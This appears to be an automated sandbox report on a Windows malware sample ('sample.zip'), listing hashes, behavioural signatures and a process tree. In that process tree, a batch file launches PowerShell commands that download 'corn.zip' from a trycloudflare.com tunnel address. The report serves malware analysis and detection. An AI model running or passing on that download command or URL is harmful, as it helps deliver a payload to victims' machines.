Analysis
-
max time kernel
1563s -
max time network
1565s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26-09-2024 13:58
Static task
static1
Behavioral task
behavioral1
Sample
sample.zip
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
sample.zip
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
sample.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
sample.zip
Resource
win11-20240802-en
General
-
Target
sample.zip
-
Size
42.8MB
-
MD5
7579c349d3f04d81d16020218b4b014e
-
SHA1
7299091625d2af8508e6c3e07e236ee47ac4400a
-
SHA256
0366ac31796c460c24e7d71469e86f4c7e9509f3b52f4c24921d19d7b5786f16
-
SHA512
6e7a4f071e8c74686d18892768e8158d00fba5bebad9bd0947374b08b79b7b0fa87f756618ad80ba5728db71db42a556fad990066f9d87232c0c2e35d00e3e94
-
SSDEEP
786432:oDXXuerfHkIZf06hLwbl9Pm2TW38ZF+oxwk4fbSep82zpMN8:oDnXfHkIZcXM2TdZooxwnXWN8
Malware Config
Signatures
-
pid Process 1652 powershell.exe 1508 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1652 powershell.exe 1508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: 33 912 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 912 AUDIODG.EXE Token: 33 912 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 912 AUDIODG.EXE Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 908 wrote to memory of 1652 908 cmd.exe 38 PID 908 wrote to memory of 1652 908 cmd.exe 38 PID 908 wrote to memory of 1652 908 cmd.exe 38 PID 908 wrote to memory of 1508 908 cmd.exe 39 PID 908 wrote to memory of 1508 908 cmd.exe 39 PID 908 wrote to memory of 1508 908 cmd.exe 39
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\sample.zip1⤵PID:1984
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1980
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4e41⤵
- Suspicious use of AdjustPrivilegeToken
PID:912
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Documents\sample\corn.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD543139d7fa5f8f17cb66e698b3ab40005
SHA1ec9c2e3cc0ee7e0e2136dc96bd4402b461b8a64a
SHA2567fd312245c16a943b83fab4698b6753fefb5a3a55e7b0fa6ff3fdfc6e1d93454
SHA5123faf3801996afb60ad0d245fec488a5e96db8e3c4addf5c6a3a12f3053ad906a10ecb90fa7767b401081715493d993070df8e3fb8653e7cc7713eba14b34a568